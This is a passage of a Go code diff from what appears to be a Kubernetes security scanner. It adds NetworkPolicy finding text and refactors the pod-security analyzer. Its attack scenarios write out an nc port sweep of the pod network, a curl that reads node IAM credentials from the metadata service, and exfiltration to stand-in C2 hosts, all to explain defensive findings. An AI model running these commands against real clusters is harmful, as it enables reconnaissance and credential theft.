+//
+// Sources: Kubernetes NetworkPolicy docs, CIS Kubernetes Benchmark 5.3.2, NSA/CISA Kubernetes
+// Hardening Guide v1.2, Calico/Cilium docs, MITRE ATT&CK Containers, Christophe Tafani-Dereeper
+// EKS-IMDS escalation, ahmetb network-policy-recipes.
+package network
+
+import (
+	"fmt"
+
+	"github.com/hardik/kubesplaining/internal/models"
+)
+
+type ruleContent struct {
+	Title            string
+	Scope            models.Scope
+	Description      string
+	Impact           string
+	AttackScenario   []string
+	Remediation      string
+	RemediationSteps []string
+	LearnMore        []models.Reference
+	MitreTechniques  []models.MitreTechnique
+}
+
+var (
+	mitreT1552_005 = models.MitreTechnique{ID: "T1552.005", Name: "Cloud Instance Metadata API", URL: "https://attack.mitre.org/techniques/T1552/005/"}
+	mitreT1041     = models.MitreTechnique{ID: "T1041", Name: "Exfiltration Over C2 Channel", URL: "https://attack.mitre.org/techniques/T1041/"}
+	mitreT1071     = models.MitreTechnique{ID: "T1071", Name: "Application Layer Protocol", URL: "https://attack.mitre.org/techniques/T1071/"}
+	mitreT1090     = models.MitreTechnique{ID: "T1090", Name: "Proxy", URL: "https://attack.mitre.org/techniques/T1090/"}
+	mitreT1018     = models.MitreTechnique{ID: "T1018", Name: "Remote System Discovery", URL: "https://attack.mitre.org/techniques/T1018/"}
+	mitreT1046     = models.MitreTechnique{ID: "T1046", Name: "Network Service Discovery", URL: "https://attack.mitre.org/techniques/T1046/"}
+	mitreT1567     = models.MitreTechnique{ID: "T1567", Name: "Exfiltration Over Web Service", URL: "https://attack.mitre.org/techniques/T1567/"}
+	mitreT1078_004 = models.MitreTechnique{ID: "T1078.004", Name: "Valid Accounts: Cloud Accounts", URL: "https://attack.mitre.org/techniques/T1078/004/"}
+)
+
+var (
+	refNetworkPolicies = models.Reference{Title: "Kubernetes — Network Policies", URL: "https://kubernetes.io/docs/concepts/services-networking/network-policies/"}
+	refCISBenchmark532 = models.Reference{Title: "CIS Kubernetes Benchmark 5.3.2 — All namespaces should have NetworkPolicies", URL: "https://www.cisecurity.org/benchmark/kubernetes"}
+	refNSAHardening    = models.Reference{Title: "NSA/CISA Kubernetes Hardening Guidance v1.2 (PDF)", URL: "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF"}
+)
+
+func contentNetpolCoverage001(namespace string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("Namespace `%s` has zero NetworkPolicies — all pods accept any inbound and reach any outbound endpoint", namespace),
+		Scope: models.Scope{
+			Level:  models.ScopeNamespace,
+			Detail: fmt.Sprintf("Namespace `%s` — every workload inside inherits allow-all behavior", namespace),
+		},
+		Description: fmt.Sprintf("Namespace `%s` contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at `169.254.169.254`, the public internet, and the API server).\n\n"+
+			"This is the documented Kubernetes default — a pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant `policyTypes` selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.\n\n"+
+			"A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.",
+			namespace),
+		Impact: "Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker exploits an unpatched dependency in any pod in `%s` and lands a shell.", namespace),
+			"They scan the pod CIDR (`for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done`) — every database port across every namespace is reachable.",
+			"They hit the cloud metadata endpoint `curl http://169.254.169.254/latest/meta-data/iam/security-credentials/` and exfiltrate the node's IAM credentials.",
+			"They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.",
+			"They pivot cluster-wide: query kube-DNS for `*.svc.cluster.local`, identify Vault/Postgres/Redis, authenticate with stolen tokens — full lateral movement.",
+		},
+		Remediation: fmt.Sprintf("Apply a default-deny-all NetworkPolicy in `%s`, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.", namespace),
+		RemediationSteps: []string{
+			fmt.Sprintf("Apply a default-deny baseline (`podSelector: {}`, `policyTypes: [Ingress, Egress]`) to `%s`.", namespace),
+			"Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system) — without DNS every workload's hostname resolution will fail.",
+			"For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies — never `0.0.0.0/0`.",
+			fmt.Sprintf("Validate with a debug pod: `kubectl run -n %s --rm -it tmp --image=nicolaka/netshoot -- bash` confirming allowed paths work and disallowed paths time out.", namespace),
+			"Wire CIS 5.3.2 / Kyverno's `require-network-policy` policy into CI so future namespaces ship with a baseline.",
+		},
+		LearnMore: []models.Reference{
+			refNetworkPolicies,
+			refCISBenchmark532,
+			refNSAHardening,
+			{Title: "Calico — get started with Kubernetes NetworkPolicy", URL: "https://docs.tigera.io/calico/latest/network-policy/get-started/kubernetes-policy/kubernetes-network-policy"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_005, mitreT1041, mitreT1071, mitreT1090, mitreT1018, mitreT1046},
+	}
+}
+
+func contentNetpolWeakness002(namespace, policyName, cidr string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("NetworkPolicy `%s/%s` allows egress to `%s` (entire internet)", namespace, policyName, cidr),
+		Scope: models.Scope{
+			Level:  models.ScopeObject,
+			Detail: fmt.Sprintf("NetworkPolicy `%s/%s` — the workloads it selects can reach any IPv4/IPv6 destination", namespace, policyName),
+		},
+		Description: fmt.Sprintf("NetworkPolicy `%s/%s` contains an egress rule whose `ipBlock.cidr` is `%s`. This is the broadest possible CIDR — semantically equivalent to \"allow this workload to make outbound connections to any destination.\" Because NetworkPolicy egress rules are additive, this single rule defeats whatever segmentation other policies tried to build for the selected pods.\n\n"+
+			"Two properties make this rule especially dangerous: (1) `0.0.0.0/0` includes the link-local range that holds the cloud Instance Metadata Service (`169.254.169.254/32` on AWS/Azure, `metadata.google.internal` on GCP), so a compromised pod can scrape node IAM credentials and pivot to the underlying cloud account; (2) `0.0.0.0/0` also includes the Pod and Service CIDRs of the cluster itself, so the rule does not just open the internet — it also opens inter-namespace traffic for the selected pods unless an `except:` block carves out the cluster ranges.\n\n"+
+			"A correctly-scoped egress policy uses an `ipBlock` with the specific CIDRs the workload needs (a private VPC peer, a known SaaS provider's published range), or a `namespaceSelector + podSelector` pair to a named in-cluster dependency. `0.0.0.0/0` should never appear in a production egress allow rule.",
+			namespace, policyName, cidr),
+		Impact: "Selected workload can reach any IP, including cloud IMDS (credential theft) and arbitrary attacker C2 (data exfiltration) — turns any pod compromise into cloud-account compromise.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises a pod selected by `%s.spec.podSelector`.", policyName),
+			"They hit `http://169.254.169.254/latest/meta-data/iam/security-credentials/` and pull the node's IAM credentials — the egress rule allows this because IMDS is inside `0.0.0.0/0`.",
+			"They use stolen IAM credentials with `aws sts get-caller-identity` then enumerate the cloud account.",
+			"They open an outbound TLS connection to `c2.attacker.example` on 443 (covered by the same broad rule) and exfiltrate harvested secrets.",
+			"They abuse the same broad CIDR to reach other in-cluster Services unless `except:` carves out the cluster ranges.",
+		},
+		Remediation: "Replace `0.0.0.0/0` with the specific CIDRs the workload needs, or use `namespaceSelector`/`podSelector` for in-cluster destinations, and explicitly carve out the IMDS range.",
+		RemediationSteps: []string{
+			fmt.Sprintf("Inventory what `%s`'s selected pods actually need to reach (use `kubectl exec ... -- ss -tnp` or VPC flow logs).", policyName),
+			"Replace the `0.0.0.0/0` rule with a specific allowlist — ipBlocks for required SaaS CIDRs, namespaceSelector/podSelector for in-cluster targets.",
+			"At a CNI tier (Calico GlobalNetworkPolicy or Cilium ClusterwideNetworkPolicy), add a non-overridable deny for `169.254.169.254/32`.",
+			"Validate with a netshoot pod: confirm legitimate destinations resolve and connect; confirm `curl --max-time 3 http://169.254.169.254/` and arbitrary internet hosts time out.",
+			"Add a Kyverno or OPA Gatekeeper policy that rejects any new NetworkPolicy whose ipBlock CIDR is `0.0.0.0/0` or `::/0`.",
+		},
+		LearnMore: []models.Reference{
+			refNetworkPolicies,
+			{Title: "Calico GlobalNetworkPolicy reference", URL: "https://docs.tigera.io/calico/latest/reference/resources/globalnetworkpolicy"},
+			{Title: "Christophe Tafani-Dereeper — EKS privilege escalation via worker node IAM", URL: "https://blog.christophetd.fr/privilege-escalation-in-aws-elastic-kubernetes-service-eks-by-compromising-the-instance-role-of-worker-nodes/"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_005, mitreT1041, mitreT1071, mitreT1090, mitreT1567},
+	}
+}
+
+func contentNetpolCoverage002(kind, namespace, name string, labels map[string]string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("Workload `%s/%s/%s` is in a policied namespace but no policy podSelector matches it", kind, namespace, name),
+		Scope: models.Scope{
+			Level:  models.ScopeWorkload,
+			Detail: fmt.Sprintf("Workload `%s/%s/%s` (labels %v) — covered by no NetworkPolicy in `%s`", kind, namespace, name, labels, namespace),
+		},
+		Description: fmt.Sprintf("Workload `%s/%s/%s` runs in `%s` which has at least one NetworkPolicy, but none of those policies' `podSelector` clauses match this workload's labels (`%v`). The Kubernetes NetworkPolicy specification is explicit: a pod is \"non-isolated\" for ingress/egress until a NetworkPolicy with the corresponding `policyTypes` entry selects it.\n\n"+
+			"This is the most common misconfiguration in clusters that have started rolling out NetworkPolicies: the operator added policies for the visible apps and forgot a sidecar Job, a CronJob spawned by an operator, a debug Deployment, or a workload whose labels were renamed. \"Selected by no policy\" is semantically identical to \"in a namespace with no policies at all\" for this specific pod — full allow-in, full allow-out — even though `kubectl get netpol` makes the namespace look protected.\n\n"+
+			"The failure mode is invisible at a glance: dashboards say \"NetworkPolicies present in namespace,\" CIS 5.3.2 may pass, but the uncovered workload is exactly the kind of pod attackers love — operator-managed, often privileged, often forgotten.",
+			kind, namespace, name, namespace, labels),
+		Impact: "This single workload retains full allow-all ingress and egress while the rest of the namespace is segmented — making it the easiest pivot point for an attacker who lands anywhere else in the cluster.",
+		AttackScenario: []string{
+			"Attacker compromises a low-value pod elsewhere in the cluster (CVE in a web app).",
+			fmt.Sprintf("They scan the namespace's pod CIDR for reachable services. Other pods in `%s` correctly drop unsolicited traffic — except `%s`, which is uncovered.", namespace, name),
+			fmt.Sprintf("They hit `%s`'s exposed application port and exploit a known issue, gaining a shell.", name),
+			fmt.Sprintf("From `%s`, attacker has unrestricted egress: hits IMDS for cloud IAM credentials, opens C2 to attacker IPs, uses the pod's mounted ServiceAccount token against the API server.", name),
+			"The attacker now has the network position the rest of the namespace's policies were designed to prevent.",
+		},
+		Remediation: fmt.Sprintf("Either deploy a namespace-wide default-deny baseline in `%s` so every new pod is automatically covered, or add an explicit policy whose `podSelector` matches this workload's labels.", namespace),
+		RemediationSteps: []string{
+			fmt.Sprintf("Add a default-deny baseline (`podSelector: {}`, `policyTypes: [Ingress, Egress]`) in `%s` so future pods fail closed.", namespace),
+			fmt.Sprintf("Write an explicit allow policy whose `podSelector` matches `%s`'s labels and lists only the ingress sources and egress destinations it needs.", name),
+			"Validate by re-running this scanner; the workload should now match at least one policy.",
+			"Add a CI check (Kyverno's `require-matching-network-policy` or an OPA constraint) that fails if a new workload is admitted with labels not covered by any existing NetworkPolicy.",
+		},
+		LearnMore: []models.Reference{
+			refNetworkPolicies,
+			refCISBenchmark532,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1046, mitreT1018, mitreT1041, mitreT1552_005, mitreT1090},
+	}
+}
+
+func contentNetpolCoverage003(namespace string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("Namespace `%s` controls ingress but has no Egress policy (one-way enforcement)", namespace),
+		Scope: models.Scope{
+			Level:  models.ScopeNamespace,
+			Detail: fmt.Sprintf("Namespace `%s` — pods are firewalled inbound but can reach any outbound destination", namespace),
+		},
+		Description: fmt.Sprintf("Namespace `%s` has NetworkPolicy objects that select pods for ingress filtering but no NetworkPolicy enforces egress. In Kubernetes' policy model, ingress and egress are independent dimensions: a pod is isolated for ingress only if a policy with `policyTypes: Ingress` selects it, and isolated for egress only if a policy with `policyTypes: Egress` selects it. A pod can be tightly firewalled inbound and still reach the entire internet outbound — exactly the asymmetry seen here.\n\n"+
+			"This is a classic misconfiguration after a half-finished zero-trust migration. Teams typically write ingress policies first because they think of \"who can talk to my service,\" and ship without revisiting outbound. The result looks compliant in dashboards but leaves data exfiltration, cloud IMDS access, and outbound C2 wide open.\n\n"+
+			"The practical risk is that egress is the dimension attackers actually want. Inbound restrictions help against external scanners, but a compromised pod's value to an attacker is in what it can talk *out* to: the cloud control plane via IMDS, attacker-controlled C2, internal databases in other namespaces, and the cluster's kube-apiserver.",
+			namespace),
+		Impact: "Compromised pods in this namespace retain full outbound reach — IMDS credential theft, C2 callbacks, and lateral pivots out of the namespace are unimpeded.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises any pod in `%s`.", namespace),
+			"They hit IMDS — the namespace has no egress policy, so the request succeeds and node IAM credentials are exfiltrated.",
+			"They establish C2 to `attacker.example:443` and stream captured tokens, environment variables, and pod-mounted secrets.",
+			"They pivot to other namespaces by talking to ClusterIP Services directly — the missing egress policy doesn't restrict cluster-internal destinations either.",
+			"They call kube-apiserver with the pod's ServiceAccount token (egress to apiserver also unrestricted), enumerating RBAC for any privesc opportunity.",
+		},
+		Remediation: fmt.Sprintf("Add a default-deny-egress NetworkPolicy in `%s`, then explicit per-workload egress allowlists for DNS and actual outbound dependencies.", namespace),
+		RemediationSteps: []string{
+			fmt.Sprintf("Apply a `default-deny-egress` policy in `%s` targeting `podSelector: {}` so every pod becomes egress-isolated.", namespace),
+			"Add an explicit DNS-allow policy (UDP/TCP 53 to kube-system).",
+			"For each workload that has legitimate egress, add a tight `to:` clause (specific Service, namespaceSelector+podSelector, or specific external CIDR — never `0.0.0.0/0`).",
+			"Validate by `kubectl exec` into a representative pod and confirming `curl --max-time 3 https://example.com/` times out.",
+			"Wire CI policy (Kyverno `require-policytypes-egress`) to fail any future namespace with ingress-only coverage.",
+		},
+		LearnMore: []models.Reference{
+			refNetworkPolicies,
+			{Title: "Red Hat — Guide to Kubernetes egress NetworkPolicies", URL: "https://www.redhat.com/en/blog/guide-to-kubernetes-egress-network-policies"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1041, mitreT1071, mitreT1552_005, mitreT1567, mitreT1090},
+	}
+}
+
+func contentNetpolWeakness001(namespace, policyName string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("NetworkPolicy `%s/%s` accepts ingress from any namespace via empty namespaceSelector", namespace, policyName),
+		Scope: models.Scope{
+			Level:  models.ScopeObject,
+			Detail: fmt.Sprintf("NetworkPolicy `%s/%s` — selected pods are reachable from every namespace, present and future", namespace, policyName),
+		},
+		Description: fmt.Sprintf("NetworkPolicy `%s/%s` contains an ingress `from:` peer with a `namespaceSelector` that has no `matchLabels` and no `matchExpressions`. In NetworkPolicy semantics this is the special form that means \"every namespace in the cluster\" — exactly the opposite of the Kubernetes default for `from:` peers (which is \"only the policy's own namespace\").\n\n"+
+			"In multi-tenant or shared clusters the impact is direct: namespace boundaries are the cheapest soft tenancy boundary Kubernetes offers, and `namespaceSelector: {}` invalidates that boundary for the selected pods. A compromised pod in any tenant — even one with no business need to talk to these pods — has unrestricted access on the allowed ports.\n\n"+
+			"The correct pattern is to scope the `namespaceSelector` to the specific labels that identify allowed source namespaces (e.g., `tenancy.example.com/team: data-platform`) and combine it with an explicit `podSelector` so only the right pods in the right namespaces can connect. Combined selectors mean \"pods matching label X in namespaces matching label Y\" — the AND form, not the OR form.",
+			namespace, policyName),
+		Impact: "Selected workloads are reachable from any pod in any namespace on the allowed ports — defeating namespace-based tenant isolation and inviting cross-tenant lateral movement.",
+		AttackScenario: []string{
+			"Attacker compromises a low-value pod in some other namespace (CI runner, stale demo, shared sidecar).",
+			fmt.Sprintf("They enumerate ClusterIP Services and notice the Service backing `%s`'s pods in `%s`.", policyName, namespace),
+			"They attempt a TCP connect from the other namespace — under any other policy this would be denied at the CNI, but `namespaceSelector: {}` matches and the connection succeeds.",
+			"They exploit an application-layer issue on the now-reachable port (auth bypass, weak credential, RCE) and pivot into the high-value workload.",
+			"They continue lateral motion from inside the target namespace using mounted tokens and secrets.",
+		},
+		Remediation: "Replace the empty `namespaceSelector` with explicit labels identifying the small set of namespaces that legitimately need access, paired with a `podSelector`.",
+		RemediationSteps: []string{
+			"Identify which namespaces actually need to reach the selected pods (often one or two — never \"all\").",
+			"Label those namespaces with a stable, policy-meaningful key (e.g., `tenancy.example.com/team: data-platform`).",
+			fmt.Sprintf("Edit `%s` to replace `namespaceSelector: {}` with `matchLabels` for the chosen label, and add a sibling `podSelector`.", policyName),
+			"Validate by attempting connections from a netshoot pod in a non-allowed namespace (must time out) and from an allowed namespace (must succeed).",
+			"Add a Kyverno or OPA Gatekeeper rule that warns on any new NetworkPolicy with an empty `namespaceSelector` peer.",
+		},
+		LearnMore: []models.Reference{
+			refNetworkPolicies,
+			{Title: "ahmetb network-policy-recipes — allow traffic from all namespaces (illustrates the foot-gun)", URL: "https://github.com/ahmetb/kubernetes-network-policy-recipes/blob/master/05-allow-traffic-from-all-namespaces.md"},
+			{Title: "vCluster — NetworkPolicies for multi-tenant isolation", URL: "https://www.vcluster.com/blog/kubernetes-network-policies-for-isolating-namespaces"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1046, mitreT1018, mitreT1090, mitreT1078_004},
+	}
+}

--- a/internal/analyzer/podsec/analyzer.go
+++ b/internal/analyzer/podsec/analyzer.go
@@ -51,43 +51,31 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 		}
 
 		if serviceAccount == "default" && !strings.HasPrefix(target.Namespace, "kube-") {
-			findings = appendFinding(findings, seen, newFinding(target, "KUBE-SA-DEFAULT-001", models.SeverityMedium, models.CategoryPrivilegeEscalation, scoring.Clamp(5.4),
-				"Default service account in use",
-				"This workload runs with the namespace default service account, which increases blast radius when that account accumulates permissions.",
-				map[string]any{"service_account": serviceAccount},
-				"Create a dedicated least-privilege service account for the workload and disable token mounting if the API is not required.",
-				"https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/",
-				"defaultServiceAccount"))
+			content := contentSADefault001(target.Kind, target.Namespace, target.Name, serviceAccount)
+			findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-SA-DEFAULT-001",
+				models.SeverityMedium, models.CategoryPrivilegeEscalation, scoring.Clamp(5.4),
+				map[string]any{"service_account": serviceAccount}, "defaultServiceAccount", content).as())
 		}
 
 		if target.PodSpec.HostNetwork {
-			findings = appendFinding(findings, seen, newFinding(target, "KUBE-ESCAPE-003", models.SeverityHigh, models.CategoryLateralMovement, scoring.Clamp(8.1),
-				"Host network enabled",
-				"This workload shares the node network namespace, increasing exposure to node-local services and cloud metadata endpoints.",
-				map[string]any{"hostNetwork": true},
-				"Avoid `hostNetwork` unless the workload genuinely needs node-level network access.",
-				"https://kubernetes.io/docs/concepts/security/pod-security-standards/",
-				"hostNetwork"))
+			content := contentEscape003(target.Kind, target.Namespace, target.Name)
+			findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-ESCAPE-003",
+				models.SeverityHigh, models.CategoryLateralMovement, scoring.Clamp(8.1),
+				map[string]any{"hostNetwork": true}, "hostNetwork", content).as())
 		}
 
 		if target.PodSpec.HostPID {
-			findings = appendFinding(findings, seen, newFinding(target, "KUBE-ESCAPE-002", models.SeverityCritical, models.CategoryPrivilegeEscalation, scoring.Clamp(9.0),
-				"Host PID enabled",
-				"This workload can observe or interact with processes running on the node.",
-				map[string]any{"hostPID": true},
-				"Disable `hostPID` for application workloads.",
-				"https://kubernetes.io/docs/concepts/security/pod-security-standards/",
-				"hostPID"))
+			content := contentEscape002(target.Kind, target.Namespace, target.Name)
+			findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-ESCAPE-002",
+				models.SeverityCritical, models.CategoryPrivilegeEscalation, scoring.Clamp(9.0),
+				map[string]any{"hostPID": true}, "hostPID", content).as())
 		}
 
 		if target.PodSpec.HostIPC {
-			findings = appendFinding(findings, seen, newFinding(target, "KUBE-ESCAPE-004", models.SeverityHigh, models.CategoryPrivilegeEscalation, scoring.Clamp(8.0),
-				"Host IPC enabled",
-				"This workload shares the node IPC namespace, weakening isolation from the host.",
-				map[string]any{"hostIPC": true},
-				"Disable `hostIPC` unless the workload is a trusted node-level component.",
-				"https://kubernetes.io/docs/concepts/security/pod-security-standards/",
-				"hostIPC"))
+			content := contentEscape004(target.Kind, target.Namespace, target.Name)
+			findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-ESCAPE-004",
+				models.SeverityHigh, models.CategoryPrivilegeEscalation, scoring.Clamp(8.0),
+				map[string]any{"hostIPC": true}, "hostIPC", content).as())
 		}
 
 		for _, volume := range target.PodSpec.Volumes {
@@ -97,80 +85,61 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 
 			score := 7.6
 			ruleID := "KUBE-HOSTPATH-001"
-			title := "HostPath volume mount"
-			description := "This workload mounts a host path from the node filesystem."
+			var content ruleContent
 
 			switch volume.HostPath.Path {
 			case "/":
 				score = 10
 				ruleID = "KUBE-ESCAPE-006"
-				title = "Root filesystem hostPath mount"
-				description = "This workload mounts the node root filesystem and can likely escape container isolation."
+				content = contentEscape006(target.Kind, target.Namespace, target.Name, volume.Name)
 			case "/var/run/docker.sock":
 				score = 10
 				ruleID = "KUBE-ESCAPE-005"
-				title = "Docker socket mount"
-				description = "Mounting the Docker socket gives the container control over sibling containers and often the node."
+				content = contentEscape005(target.Kind, target.Namespace, target.Name, volume.Name)
 			case "/var/run/containerd/containerd.sock":
 				score = 9.8
 				ruleID = "KUBE-CONTAINERD-SOCKET-001"
-				title = "Containerd socket mount"
-				description = "Mounting the container runtime socket can allow container breakout or host control."
+				content = contentContainerdSocket001(target.Kind, target.Namespace, target.Name, volume.Name)
 			case "/var/log":
 				score = 8.5
 				ruleID = "KUBE-ESCAPE-008"
-				title = "Host log directory mounted"
-				description = "Writable or broadly exposed host logs can enable log-based host file access techniques."
+				content = contentEscape008(target.Kind, target.Namespace, target.Name, volume.Name)
+			default:
+				content = contentHostPath001(target.Kind, target.Namespace, target.Name, volume.Name, volume.HostPath.Path)
 			}
 
-			findings = appendFinding(findings, seen, newFinding(target, ruleID, severityForScore(score), models.CategoryPrivilegeEscalation, scoring.Clamp(score),
-				title,
-				description,
-				map[string]any{"volume": volume.Name, "path": volume.HostPath.Path},
-				"Replace hostPath volumes with safer abstractions like projected volumes, ConfigMaps, Secrets, or CSI drivers.",
-				"https://kubernetes.io/docs/concepts/storage/volumes/#hostpath",
-				"hostPath"))
+			findings = appendFinding(findings, seen, newFindingFromContent(target, ruleID,
+				severityForScore(score), models.CategoryPrivilegeEscalation, scoring.Clamp(score),
+				map[string]any{"volume": volume.Name, "path": volume.HostPath.Path}, "hostPath", content).withSuffix(":"+volume.Name))
 		}
 
 		for _, container := range allContainers(target.PodSpec) {
 			if container.SecurityContext != nil && container.SecurityContext.Privileged != nil && *container.SecurityContext.Privileged {
-				findings = appendFinding(findings, seen, newFinding(target, "KUBE-ESCAPE-001", models.SeverityCritical, models.CategoryPrivilegeEscalation, scoring.Clamp(9.9),
-					fmt.Sprintf("Privileged container: %s", container.Name),
-					"This container runs in privileged mode and effectively has host-level capabilities.",
-					map[string]any{"container": container.Name},
-					"Drop privileged mode and grant only the explicit Linux capabilities the workload needs.",
-					"https://kubernetes.io/docs/concepts/security/pod-security-standards/",
-					"privileged"))
+				content := contentEscape001(target.Kind, target.Namespace, target.Name, container.Name)
+				findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-ESCAPE-001",
+					models.SeverityCritical, models.CategoryPrivilegeEscalation, scoring.Clamp(9.9),
+					map[string]any{"container": container.Name}, "privileged", content).withSuffix(":"+container.Name))
 			}
 
 			if container.SecurityContext == nil || container.SecurityContext.AllowPrivilegeEscalation == nil || *container.SecurityContext.AllowPrivilegeEscalation {
-				findings = appendFinding(findings, seen, newFinding(target, "KUBE-PODSEC-APE-001", models.SeverityHigh, models.CategoryPrivilegeEscalation, scoring.Clamp(7.8),
-					fmt.Sprintf("Privilege escalation allowed in container: %s", container.Name),
-					"This container does not explicitly disable Linux privilege escalation.",
-					map[string]any{"container": container.Name},
-					"Set `allowPrivilegeEscalation: false` unless the container requires setuid/setgid behavior.",
-					"https://kubernetes.io/docs/concepts/security/pod-security-standards/",
-					"allowPrivilegeEscalation"))
+				content := contentPodSecAPE001(target.Kind, target.Namespace, target.Name, container.Name)
+				findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-PODSEC-APE-001",
+					models.SeverityHigh, models.CategoryPrivilegeEscalation, scoring.Clamp(7.8),
+					map[string]any{"container": container.Name}, "allowPrivilegeEscalation", content).withSuffix(":"+container.Name))
 			}
 
 			if runsAsRoot(target.PodSpec, container) {
-				findings = appendFinding(findings, seen, newFinding(target, "KUBE-PODSEC-ROOT-001", models.SeverityMedium, models.CategoryPrivilegeEscalation, scoring.Clamp(6.0),
-					fmt.Sprintf("Container runs as root: %s", container.Name),
-					"This container is configured to run as UID 0 or explicitly disables non-root enforcement.",
-					map[string]any{"container": container.Name},
-					"Run the container as a non-root user and set `runAsNonRoot: true`.",
-					"https://kubernetes.io/docs/concepts/security/pod-security-standards/",
-					"runAsRoot"))
+				content := contentPodSecRoot001(target.Kind, target.Namespace, target.Name, container.Name)
+				findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-PODSEC-ROOT-001",
+					models.SeverityMedium, models.CategoryPrivilegeEscalation, scoring.Clamp(6.0),
+					map[string]any{"container": container.Name}, "runAsRoot", content).withSuffix(":"+container.Name))
 			}
 
 			if usesLatestTag(container.Image) {
-				findings = appendFinding(findings, seen, newFinding(target, "KUBE-IMAGE-LATEST-001", models.SeverityLow, models.CategoryDefenseEvasion, scoring.Clamp(2.5),
-					fmt.Sprintf("Mutable image tag used: %s", container.Name),
-					"This container image uses a mutable tag or no tag, which makes provenance and rollback harder.",
-					map[string]any{"container": container.Name, "image": container.Image},
-					"Pin the image to an immutable version tag or digest.",
-					"https://kubernetes.io/docs/concepts/containers/images/",
-					"imageTag"))
+				content := contentImageLatest001(target.Kind, target.Namespace, target.Name, container.Name, container.Image)
+				findings = appendFinding(findings, seen, newFindingFromContent(target, "KUBE-IMAGE-LATEST-001",
+					models.SeverityLow, models.CategoryDefenseEvasion, scoring.Clamp(2.5),
+					map[string]any{"container": container.Name, "image": container.Image}, "imageTag", content).withSuffix(":"+container.Name))
 			}
 		}
 	}
@@ -270,8 +239,28 @@ func usesLatestTag(image string) bool {
 	return strings.HasSuffix(image, ":latest")
 }
 
-// newFinding materializes a pod-security Finding tied to the given target.
-func newFinding(target target, ruleID string, severity models.Severity, category models.RiskCategory, score float64, title string, description string, evidence map[string]any, remediation string, reference string, check string) models.Finding {
+// findingWithID wraps a Finding so analyzer call-sites can apply a per-container ID suffix
+// (different containers in the same workload should each produce a unique finding ID).
+type findingWithID models.Finding
+
+// withSuffix appends suffix to the Finding.ID and returns the result. Used so per-container
+// findings (privileged, runAsRoot, etc.) inside the same workload don't collide on ID.
+func (f findingWithID) withSuffix(suffix string) models.Finding {
+	out := models.Finding(f)
+	out.ID = out.ID + suffix
+	return out
+}
+
+// as returns the underlying Finding without an ID suffix. Used at call sites that don't need
+// per-container disambiguation.
+func (f findingWithID) as() models.Finding {
+	return models.Finding(f)
+}
+
+// newFindingFromContent materializes a pod-security Finding using the enriched ruleContent
+// (Scope, Impact, AttackScenario, RemediationSteps, LearnMore, MitreTechniques) plus the
+// runtime context. Returns findingWithID so per-container variants can use .withSuffix().
+func newFindingFromContent(target target, ruleID string, severity models.Severity, category models.RiskCategory, score float64, evidence map[string]any, check string, content ruleContent) findingWithID {
 	evidenceBytes, _ := json.Marshal(evidence)
 	resource := &models.ResourceRef{
 		Kind:      target.Kind,
@@ -279,21 +268,31 @@ func newFinding(target target, ruleID string, severity models.Severity, category
 		Namespace: target.Namespace,
 		APIGroup:  resourceAPIGroup(target.Kind),
 	}
-	return models.Finding{
-		ID:          fmt.Sprintf("%s:%s:%s:%s", ruleID, target.Kind, target.Namespace, target.Name),
-		RuleID:      ruleID,
-		Severity:    severity,
-		Score:       score,
-		Category:    category,
-		Title:       title,
-		Description: description,
-		Namespace:   target.Namespace,
-		Resource:    resource,
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References:  []string{reference},
-		Tags:        []string{"module:pod_security", "check:" + check},
+	references := make([]string, 0, len(content.LearnMore))
+	for _, ref := range content.LearnMore {
+		references = append(references, ref.URL)
 	}
+	return findingWithID(models.Finding{
+		ID:               fmt.Sprintf("%s:%s:%s:%s", ruleID, target.Kind, target.Namespace, target.Name),
+		RuleID:           ruleID,
+		Severity:         severity,
+		Score:            score,
+		Category:         category,
+		Title:            content.Title,
+		Description:      content.Description,
+		Namespace:        target.Namespace,
+		Resource:         resource,
+		Scope:            content.Scope,
